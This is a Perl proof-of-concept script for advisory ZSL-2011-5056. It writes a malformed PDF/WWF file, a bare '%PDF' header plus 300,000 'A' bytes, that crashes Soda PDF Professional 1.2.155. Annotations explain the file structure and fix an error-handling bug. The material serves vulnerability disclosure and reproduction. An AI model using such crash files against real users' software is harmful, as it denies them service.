#!/usr/bin/perl
#
#
# Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)
#
#
# Vendor: LULU software
# Product web page: http://www.sodapdf.com
# Affected version: 1.2.155.1729 (Professional with OCR)
#
# Summary: Increase your efficiency with Soda PDF Professional, the smart
# & simple tool for opening, creating, editing, converting, and securing
# PDF files in a collaborative environment. Save time by using powerful
# automated features like batch PDF creation, professional templates &
# document comparison.
#
# Desc: Soda PDF Pro suffers from a restriction of service (RoS) vulnerability
# when handling PDF or WWF file formats which can be exploited by malicious
# people to cause a denial of service scenario.
#
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
#
# Advisory ID: ZSL-2011-5056
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php
#
#
# 10.11.2011
#

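use strict;
use warnings;

# Writes the malformed test document used to reproduce advisory ZSL-2011-5056
# against the affected build (1.2.155.1729). The script only creates a local
# file; it does not touch the target application itself.

# Output name; the advisory states the same content triggers the issue when
# saved with a .wwf extension.
my $file = "Midnight_in_Paris.pdf"; # or .wwf

# Payload layout: the bytes "%PDF" plus a line feed, then 300000 'A' bytes.
# `x` binds tighter than `.`, so only the "A" is repeated.
#
# Triage note: the header carries no version, and the body has no objects,
# no xref table and no %%EOF trailer. A parser that validates this structure
# before deeper processing rejects the file early.
my $tovar = "\x25\x50\x44\x46\x0A" . "\x41" x 300000;

print "\n\n[*] Creating $file file...\n";

# Three-argument open with a lexical handle. The original wrote
# `open ZSL, ">./$file" || die ...`: `||` bound to the (always true) filename
# string, so a failed open was never reported and the script went on to print
# to an unopened handle while still announcing success.
open my $zsl, '>', "./$file" or die "\nCan't open $file: $!";

# Buffered write errors (disk full, permissions) can surface at print or only
# at close, so both are checked before success is reported.
print {$zsl} $tovar or die "\nCan't write to $file: $!";
close $zsl or die "\nCan't close $file: $!";

print "\n[.] File successfully mounted!\n\n";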